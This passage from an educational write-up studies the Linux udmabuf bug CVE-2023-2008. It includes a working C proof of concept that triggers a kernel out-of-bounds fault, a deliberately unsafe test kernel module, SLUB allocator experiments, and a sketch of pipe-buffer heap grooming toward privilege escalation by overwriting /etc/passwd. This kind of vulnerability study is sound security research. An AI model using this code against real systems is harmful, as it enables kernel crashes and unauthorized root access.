Let’s try to perform an OOB access in the vulnerable code. The process that executes the following code will act as the exporter and after as the importer. This means that, in the same process, we will perform all exporter operations and then call mmap on the udmabuf file descriptor.
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/memfd.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

struct udmabuf_create
{
    uint32_t memfd;
    uint32_t flags;
    uint64_t offset;
    uint64_t size;
};

#define UDMABUF_CREATE _IOW('u', 0x42, struct udmabuf_create)
#define NUM_PAGES 10

int main(int argc, char *argv[])
{
    struct udmabuf_create create;
    int devfd, memfd, udmabuf_fd;
    off_t size = getpagesize() * NUM_PAGES;
    char *buf;

    // exporter
    if ((memfd = memfd_create("udmabuf", MFD_ALLOW_SEALING)) < 0)
    {
        printf("memfd_create error: %s\n", strerror(errno));
        return errno;
    }
    if (ftruncate(memfd, size))
    {
        printf("ftruncate error: %s\n", strerror(errno));
        return errno;
    }
    if (fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK) < 0)
    {
        printf("fcntl error: %s\n", strerror(errno));
        return errno;
    }
    if ((devfd = open("/dev/udmabuf", O_RDWR)) < 0)
    {
        printf("open /dev/udmabuf error: %s\n", strerror(errno));
        return errno;
    }

    memset(&create, 0, sizeof(create));
    create.memfd = memfd;
    create.offset = 0;
    create.size = size;
    if ((udmabuf_fd = ioctl(devfd, UDMABUF_CREATE, &create)) < 0)
    {
        printf("ioctl UDMABUF_CREATE error: %s\n", strerror(errno));
        return errno;
    }

    // importer
    if ((buf = (char *)mmap(NULL, size, PROT_READ | PROT_WRITE,
                            MAP_SHARED, udmabuf_fd, 0)) == MAP_FAILED)
    {
        printf("mmap error: %s\n", strerror(errno));
        return errno;
    }
    // grow the mapping so the OOB fault still lands inside the udmabuf VMA
    if ((buf = (char *)mremap(buf, size, size * 2, MREMAP_MAYMOVE)) == MAP_FAILED)
    {
        printf("mremap error: %s\n", strerror(errno));
        return errno;
    }

    buf[0] = 'j';
    buf[1] = 'a';
    buf[2] = 'm';
    buf[3] = 'e';
    buf[4] = 's';
    buf[5] = '\0';

    printf("arbitrary physical page read: %d\n", buf[size + 10]);

    close(udmabuf_fd);
    close(memfd);
    close(devfd);
    return 0;
}
Let’s focus on the importer part, as we already discussed everything else. We first call mmap on the udmabuf file descriptor so we can map it to our virtual memory address space. Then, mremap is needed to increase the size of the mapping, so that when we perform the out-of-bounds access, the kernel will ask the udmabuf driver for the physical page because we will still be on a udmabuf mapping. Without the mremap, the OOB access would land on a memory region that does not belong to the udmabuf driver.
After the map, we can access buf freely. We wrote the first six characters as an example: the moment we perform buf[0] = 'j', a page fault is generated and handled correctly by the driver, and the rest of that 4096-byte page becomes mapped. However, when we perform the OOB access in the print statement, buf[size + 10] faults at pgoff = 10, so the udmabuf driver tries to fetch the 11th entry of ubuf->pages, which only holds 10. This will crash the kernel.
It’s possible to check the crash log with dmesg. RIP informs the instruction that generated the crash, and it confirms that it is inside the udmabuf_vm_fault function. We can see the functions that were called through the Call Trace.
... SNIP ...
RIP: 0010:udmabuf_vm_fault+0x23/0x40
... SNIP ...
Call Trace:
__do_fault+0x57/0x111
__handle_mm_fault+0xdde/0x12c0
handle_mm_fault+0xcb/0x210
__do_page_fault+0x2a1/0x4d0
do_page_fault+0x2c/0xe0
page_fault+0x34/0x40
... SNIP ...
At this point, we can trigger a kernel bug through an OOB access. The bug generates a kernel Oops, a serious but non-fatal error in the Linux kernel: an Oops may precede a kernel panic, but it may also allow continued operation with compromised reliability. However, as stated in the CVE description, we can go further and reach privilege escalation by exploiting the OOB.
Well, the driver reads a page pointer from past the end of ubuf->pages. If we could craft a struct page * and somehow place it right after ubuf->pages, the driver would pick up this pointer and hand it to the kernel, which would happily map that page into the mmap region; from user space, we would then be able to access a physical page of our choice. This is a very powerful primitive that leads to privilege escalation, and it is exactly what the exploit does.
As we have already seen, the ubuf->pages array is allocated with kmalloc, one of the interfaces for allocating memory on the kernel heap. Even though it’s not trivial, we can apply the same concept we showed in the user-space example to the kernel heap: we need to manipulate the heap layout from user space to make the kernel allocate what we want, where we want. To achieve this, we need to understand how the kernel heap allocator works. Current Linux kernels use the SLUB allocator as the heap manager, which leads us to our next study topic.
The SLUB allocator
When we started studying the Linux kernel heap allocator, we had some difficulty understanding the meaning of the following key terms: slab (lowercase), SLAB (uppercase), SLOB, and SLUB. We will use Lexfo’s security blog explanation as a starting point:
The Linux kernel offers three different Slab allocators (only one is used): SLAB allocator: the historical allocator, focused on hardware cache optimization (Debian still uses it). SLUB allocator: the “new” standard allocator since 2007 (used by Ubuntu/CentOS/Android). SLOB allocator: designed for embedded systems with very little memory. NOTE: We will use the following naming convention: Slab is “a” Slab allocator (be it SLAB, SLUB, SLOB). The SLAB (capital) is one of the three allocators. While a slab (lowercase) is an object used by Slab allocators.
This article focuses on the SLUB allocator. There are already very well-explained articles about the Slab allocators, so we don’t feel the need to explain how they work from scratch. Our main objective in this section is to take a practical approach, with several test cases and examples. From here on, we assume the concepts presented in the first part of the ORACLE blog post are clear to the reader, as it explains the most important SLUB design principles and provides the knowledge needed to start the practical study.
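As a memory aid for the discussion below, the per-CPU structure at the heart of the SLUB fast path looks roughly like this (abridged by us from include/linux/slub_def.h in the 5.4 series):

struct kmem_cache_cpu {
        void **freelist;      /* lockless freelist: next available object */
        unsigned long tid;    /* globally unique transaction id */
        struct page *page;    /* the slab we are currently allocating from */
        struct page *partial; /* per-CPU partially allocated slabs */
        ... SNIP ...
};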
Since we want to perform different tests, we have implemented a kernel module that allows user-space applications to allocate and free memory on the kernel heap through ioctl syscall, giving us more flexibility. Then, we created a user-space program that calls our ioctl. Both codes are listed below.
Kernel module:
#include <linux/mm.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/syscalls.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/fcntl.h>
#include <linux/unistd.h>
#include <asm/uaccess.h>
#include <linux/mm_types.h>
#include <linux/miscdevice.h>

MODULE_LICENSE("GPL");

struct james_param {
        uint32_t size;
        uint64_t addr;
};

#define JAMES_ALLOC _IOWR('j', 0x1000, struct james_param)
#define JAMES_FREE  _IOW('j', 0x1001, struct james_param)

static uint64_t james_alloc(uint64_t arg)
{
        static int james_count = 0;
        struct james_param jalloc;
        uint64_t ret;

        if (copy_from_user(&jalloc, (void __user *)arg, sizeof(jalloc)))
                return 0;

        printk("call %d\n", ++james_count);

        /* hand the kernel heap address back to user space (test module only!) */
        ret = (uint64_t)kmalloc(jalloc.size, GFP_KERNEL);
        jalloc.addr = ret;

        if (copy_to_user((void __user *)arg, &jalloc, sizeof(jalloc)))
                return 0;
        return ret;
}

static uint64_t james_free(uint64_t arg)
{
        struct james_param jfree;

        if (copy_from_user(&jfree, (void __user *)arg, sizeof(jfree)))
                return 0;

        /* deliberately trusts the user-supplied address (test module only!) */
        kfree((void *)jfree.addr);
        return 1;
}

static long james_ioctl(struct file *filp, unsigned int ioctl, unsigned long arg)
{
        uint64_t ret;

        switch (ioctl) {
        case JAMES_ALLOC:
                ret = james_alloc(arg);
                break;
        case JAMES_FREE:
                ret = james_free(arg);
                break;
        default:
                ret = 0;
                break;
        }
        return ret;
}

static const struct file_operations james_fops = {
        .owner = THIS_MODULE,
        .unlocked_ioctl = james_ioctl,
};

static struct miscdevice james_misc = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "james",
        .fops = &james_fops,
        .mode = 0666,
};

static int __init james_init(void)
{
        misc_register(&james_misc);
        return 0;
}

static void __exit james_exit(void)
{
        misc_deregister(&james_misc);
}

module_init(james_init);
module_exit(james_exit);
Userspace:
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/ioctl.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>

struct james_param {
    uint32_t size;
    uint64_t addr;
};

#define JAMES_ALLOC _IOWR('j', 0x1000, struct james_param)
#define JAMES_FREE  _IOW('j', 0x1001, struct james_param)
#define N_ALLOC 500

int main()
{
    cpu_set_t mask;

    // pin ourselves to CPU 0 so all allocations hit the same kmem_cache_cpu
    CPU_ZERO(&mask);
    CPU_SET(0, &mask);
    int result = sched_setaffinity(0, sizeof(mask), &mask);

    int fd = open("/dev/james", O_RDWR);
    struct james_param buffs[N_ALLOC];

    for (int i = 0; i < N_ALLOC; i++) {
        buffs[i].size = 1024;
        ioctl(fd, JAMES_ALLOC, &buffs[i]);
        if (buffs[i].addr == 0) {
            printf("ALLOC ERROR\n");
            return 1;
        }
        printf("buffs[%d].addr: %llx\n", i, (unsigned long long)buffs[i].addr);
    }
    for (int i = 0; i < N_ALLOC; i++) {
        ioctl(fd, JAMES_FREE, &buffs[i]);
    }
    close(fd);
    return 0;
}
For our first test, we perform 500 kmallocs of size 1024, forcing the kernel to use the kmalloc-1024 cache. To let us follow exactly what happens during each allocation, we added prints inside mm/slub.c in the following functions:
- the entry of slab_alloc and __kmalloc;
- slab_alloc_node, to identify the intention to execute the FAST PATH;
- __slab_alloc, to identify the intention to execute SLOW PATH 1, SLOW PATH 2, and SLOW PATH 3;
- new_slab_objects, to identify the intention to execute SLOW PATH 4.
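To give an idea of the instrumentation (these prints are ours, not upstream code), the hook at the entry of slab_alloc_node looked roughly like this:

/* our debug print at the top of slab_alloc_node() in mm/slub.c */
printk("slab_alloc_node(s->name: %s, gfpflags: %u, node: %d, addr: %lx)\n",
       s->name, gfpflags, node, addr);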
We will split the dmesg output and analyze each part separately.
... SNIP ...
[ 335.630319] call 1
[ 335.630321] __kmalloc(size: 1024, flags: 3264)
[ 335.630321] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[ 335.630322] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[ 335.630323] FAST PATH
[ 335.630323] FAST PATH EXIT
[ 335.630324] slab_alloc_node(EXIT)
[ 335.630324] slab_alloc(EXIT)
[ 335.630324] __kmalloc(EXIT)
... SNIP ...
[ 335.630409] call 11
[ 335.630410] __kmalloc(size: 1024, flags: 3264)
[ 335.630410] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[ 335.630411] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[ 335.630411] FAST PATH
[ 335.630412] FAST PATH EXIT
[ 335.630412] slab_alloc_node(EXIT)
[ 335.630412] slab_alloc(EXIT)
[ 335.630413] __kmalloc(EXIT)
... SNIP ...
We can see that, in the first allocations, the kernel reaches the FAST PATH, which allocates the requested memory from the lockless freelist.
... SNIP ...
[ 335.630421] call 12
[ 335.630422] __kmalloc(size: 1024, flags: 3264)
[ 335.630422] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[ 335.630423] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[ 335.630423] SLOW PATH GENERAL: 1, 0, 0
[ 335.630424] SLOW PATH 1
[ 335.630424] SLOW PATH 1 EXIT
[ 335.630425] slab_alloc_node(EXIT)
[ 335.630425] slab_alloc(EXIT)
[ 335.630426] __kmalloc(EXIT)
... SNIP ...
At allocation 12, we reach the first slow path, which takes objects from the regular (locked) freelist and turns it into the lockless freelist. The number of allocations served by the lockless freelist depends on the previous state of the kernel, so 12 is not a fixed number; it will change with previous allocations.
[ 335.630506] call 19
[ 335.630506] __kmalloc(size: 1024, flags: 3264)
[ 335.630507] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[ 335.630507] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[ 335.630508] SLOW PATH GENERAL: 1, 0, 0
[ 335.630508] SLOW PATH 2
[ 335.630509] SLOW PATH 1
[ 335.630510] SLOW PATH 1 EXIT
[ 335.630510] slab_alloc_node(EXIT)
[ 335.630511] slab_alloc(EXIT)
[ 335.630511] __kmalloc(EXIT)
We hit the FAST PATH six more times and, at allocation number 19, we reach SLOW PATH 2. This happens because both the lockless and the regular freelists have run out of objects, so a partial slab must be taken from the kmem_cache_cpu and turned into the lockless freelist.
We stay inside this loop (FAST PATH -> SLOW PATH 2 -> FAST PATH ...) for a while, until there are no more partial slabs in the kmem_cache_cpu. After that, the kernel looks for partial slabs in the kmem_cache_node (SLOW PATH 3), but in our test the node had no NUMA partial slabs, which means we drop directly into SLOW PATH 4:
... SNIP ...
[ 335.631166] call 74
[ 335.631166] __kmalloc(size: 1024, flags: 3264)
[ 335.631167] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[ 335.631167] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[ 335.631168] SLOW PATH GENERAL: 1, 0, 0
[ 335.631168] SLOW PATH 3
[ 335.631169] SLOW PATH 4
[ 335.631175] SLOW PATH 4 EXIT
[ 335.631176] SLOW PATH 1
[ 335.631176] SLOW PATH 1 EXIT
[ 335.631177] slab_alloc_node(EXIT)
[ 335.631177] slab_alloc(EXIT)
[ 335.631178] __kmalloc(EXIT)
At allocation number 74, there aren’t any slabs with free objects left, so SLUB must ask the kernel for a new one. The fresh slab is set as the active slab and all its objects are put on the lockless freelist. In our Ubuntu version, each slab in the kmalloc-1024 cache is backed by a compound page containing 32 objects, which means that after allocation number 74 the lockless freelist holds 31 objects (32 minus the one we just got). We can check the slab geometry in /proc/slabinfo:
# cat /proc/slabinfo
... SNIP ...
# name <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
kmalloc-1k 1599 1600 1024 32 8 : tunables 0 0 0 : slabdata 50 50 0
... SNIP ...
Since we have 31 objects in the lockless freelist and we are at allocation number 74, we can expect that a slow path will be reached only at allocation number 106. This is exactly what happens:
... SNIP ...
[ 335.631553] call 106
[ 335.631554] __kmalloc(size: 1024, flags: 3264)
[ 335.631555] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[ 335.631555] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[ 335.631556] SLOW PATH GENERAL: 1, 0, 0
[ 335.631556] SLOW PATH 3
[ 335.631557] SLOW PATH 4
[ 335.631562] SLOW PATH 4 EXIT
[ 335.631562] SLOW PATH 1
[ 335.631563] SLOW PATH 1 EXIT
[ 335.631563] slab_alloc_node(EXIT)
[ 335.631564] slab_alloc(EXIT)
[ 335.631564] __kmalloc(EXIT)
... SNIP ...
Now, it is reasonable to think we would stay in this loop (31x FAST PATH -> SLOW PATH 4 -> 31x FAST PATH) until the last allocation. We do stay in it until allocation number 266, but the next SLOW PATH 4 appears at allocation number 295, before the expected 298. This demonstrates that we are not the only ones allocating objects from the kmalloc-1024 cache: any other process (or even an internal procedure of our own process) can operate on this cache, so it’s impossible to have total control over a cache. One piece of evidence confirming that another execution flow is allocating from this cache is the addr value of slab_alloc and slab_alloc_node:
... SNIP ...
[ 335.633668] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffb2912084)
[ 335.633669] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffb2912084)
[ 335.633669] FAST PATH
[ 335.633669] FAST PATH EXIT
[ 335.633669] slab_alloc_node(EXIT)
... SNIP ...
[ 335.633835] __kmalloc(size: 544, flags: 2592)
[ 335.633836] slab_alloc(s->name: kmalloc-1k, gfpflags: 2592, addr: ffffffffb2e899ee)
[ 335.633836] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 2592, node: -1, addr: ffffffffb2e899ee)
[ 335.633837] FAST PATH
[ 335.633837] FAST PATH EXIT
[ 335.633837] slab_alloc_node(EXIT)
[ 335.633838] slab_alloc(EXIT)
[ 335.633838] __kmalloc(EXIT)
... SNIP ...
addr is the return address passed through the _RET_IP_ macro. A different addr therefore means that slab_alloc was called by a different function, i.e., a different path was taken. Our kmalloc calls always show addr equal to 0xffffffffc067d092, unlike the cases above. An interesting point: in the first snippet above, slab_alloc was not called through kmalloc. We found out that this allocation is made by printk. Since we print information in the middle of the allocation flow, the printk allocations appear as concurrent calls and the log gets a little messy at those points. To make sure, we replaced all printk calls with trace_printk, and those allocations disappeared. We can also see, in the second snippet, a kmalloc requesting an object of 544 bytes; SLUB chose kmalloc-1024 to satisfy the request because it is the smallest cache that can hold 544 bytes.
After this journey, we end up with 500 kmalloc-1024 addresses that came from multiple places: the lockless freelist, the regular freelist, partial slabs, and brand-new slabs. One thing we’d expect is that objects coming from a newly created slab have consecutive addresses. Let’s take a look at the addresses we got. The following chart shows the difference between the addresses returned by two consecutive kmalloc calls:
If we were right, the differences should be mostly 1024 bytes. Of course, until we start getting new slabs from SLOW PATH 4, the addresses will come from scattered memory locations. However, in our test, we started getting new slabs at allocation number 74, so at least the remaining 426 returned addresses should be sequential.
Even though the address differences look odd, we know all the objects belong to the same cache. So what is happening? Let’s sort the differences and check the distribution:
Now things make more sense. The differences are mostly 1024. The remaining differences can be attributed to the first allocations landing on partial slabs, or to the boundary between the last allocation in one slab and the first in a new one.
This happens because the freelist order is randomized by a kernel hardening technique. The randomization only occurs if the CONFIG_SLAB_FREELIST_RANDOM and CONFIG_SLAB_FREELIST_HARDENED flags are set at compile time. Let’s compile the kernel without these flags, perform the same test, and analyze the distribution:
As we can see, most of the returned addresses are in order, making the SLUB behavior more predictable. In the real world, most Linux distributions enable those two flags, so we need to deal with them when developing an exploit.
Another mechanism that matters to us is the free operation. As shown in the ORACLE post, when an object is freed by the same CPU that allocated it, it goes to the head of the lockless freelist. We can therefore expect that if we free an object, it will be the one returned by the next kmalloc. Let’s perform another test to verify this behavior, modifying our user-space program as follows:
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/ioctl.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>

struct james_param {
    uint32_t size;
    uint64_t addr;
};

#define JAMES_ALLOC _IOWR('j', 0x1000, struct james_param)
#define JAMES_FREE  _IOW('j', 0x1001, struct james_param)

int main()
{
    cpu_set_t mask;

    // pin to CPU 0: an object freed on the same CPU goes back to the
    // head of the lockless freelist
    CPU_ZERO(&mask);
    CPU_SET(0, &mask);
    int result = sched_setaffinity(0, sizeof(mask), &mask);

    int fd = open("/dev/james", O_RDWR);
    struct james_param buff;

    buff.size = 1024;
    ioctl(fd, JAMES_ALLOC, &buff);
    printf("addr: %llx\n", (unsigned long long)buff.addr);
    // addr: ffff9f92c5c1d000
    ioctl(fd, JAMES_FREE, &buff);

    memset(&buff, 0, sizeof(struct james_param));
    buff.size = 1024;
    ioctl(fd, JAMES_ALLOC, &buff);
    printf("addr: %llx\n", (unsigned long long)buff.addr);
    // addr: ffff9f92c5c1d000 (the freed object is returned again)
    ioctl(fd, JAMES_FREE, &buff);

    close(fd);
    return 0;
}
It worked as expected; however, we need to keep in mind that this may not happen if other operations are performed on the cache we are dealing with.
At this point, we have learned all the Linux concepts we need to develop an exploit for our vulnerability.
Exploit implementation
As we said earlier, the exploit for this vulnerability was developed by BlueFrostSecurity labs, and they present a write-up of it on their blog. The write-up carefully discusses all the design decisions taken while developing the exploit, so we feel no need to repeat it here. For the sake of completeness, we present a summary of how the exploit reaches privilege escalation.
The array vulnerable to OOB accesses is the array of pages backing a udmabuf. This means that if we could place a pointer to the data page of /etc/passwd right after the udmabuf’s array, we could modify that file and escalate privileges. BlueFrostSecurity’s researchers achieved this using pipes. They found that struct pipe_buffer rings are allocated from the same slab cache as the udmabuf page arrays, and that the first member of a struct pipe_buffer is the struct page it refers to, so a pointer to a struct pipe_buffer is also a pointer to the struct page inside it. To overcome the freelist randomization, the researchers perform heap feng shui: they allocate several pipe_buffer rings in sequence and then free some of them to create holes, forcing the next allocation (the udmabuf’s array of pages) to land in one of those holes. If this succeeds, a struct pipe_buffer containing the struct page that holds the data of /etc/passwd will sit right after (and before) the array of pages, and an OOB access can reach it.
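To make the grooming step concrete, here is a heavily simplified sketch of ours (counts and ordering are illustrative; see the BlueFrostSecurity write-up for the real exploit). It relies on the fact that a default pipe allocates a ring of 16 struct pipe_buffer (40 bytes each in this kernel series), a 640-byte object that also lands in kmalloc-1k; <unistd.h> and <err.h> are assumed:

#define N_PIPES 64

int pipes[N_PIPES][2];

// 1. spray: fill kmalloc-1k with pipe_buffer rings
for (int i = 0; i < N_PIPES; i++) {
    if (pipe(pipes[i]) < 0)
        errx(1, "pipe");
    // writing makes the kernel attach a page to bufs[0].page
    write(pipes[i][1], "A", 1);
}

// 2. punch holes: free every other ring so a later kmalloc-1k
//    allocation likely lands between two surviving rings
for (int i = 0; i < N_PIPES; i += 2) {
    close(pipes[i][0]);
    close(pipes[i][1]);
}

// 3. now create the udmabuf: with luck, ubuf->pages reuses one of the
//    holes and is bordered by pipe_buffer rings, whose first field is
//    the struct page * the OOB fault handler will happily dereference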
Conclusion
In this post, we have shown that studying a kernel vulnerability provides good guidance for learning how Linux implements its internal mechanisms. Through CVE-2023-2008, we were able to understand how both udmabuf driver and SLUB allocator work, as well as several kernel structures, system calls and execution flows. We hope that you got a little more comfortable when reading the Linux kernel source code and that it helps you in your future studies!
References
CVE-2023-2008 patch
CVE-2023-2008
CWE-125
CWE-787
Exploit implementation
Heap feng shui
Lexfo CVE-2017-11176
Pipe Buffers exploitation
SLUB allocator
Writeup
address-space
call_mmap
dma-buf
dma
do_mmap
do_mmap_pgoff
fcntl
fork
ioctl-new-way
ioctl
kernel Oops
ksys_mmap_pgoff
malloc internals
memfd_create(2)
mmap
mmap_region
sys_mmap
udmabuf
unp-book
vm_area
vm_mmap_pgoff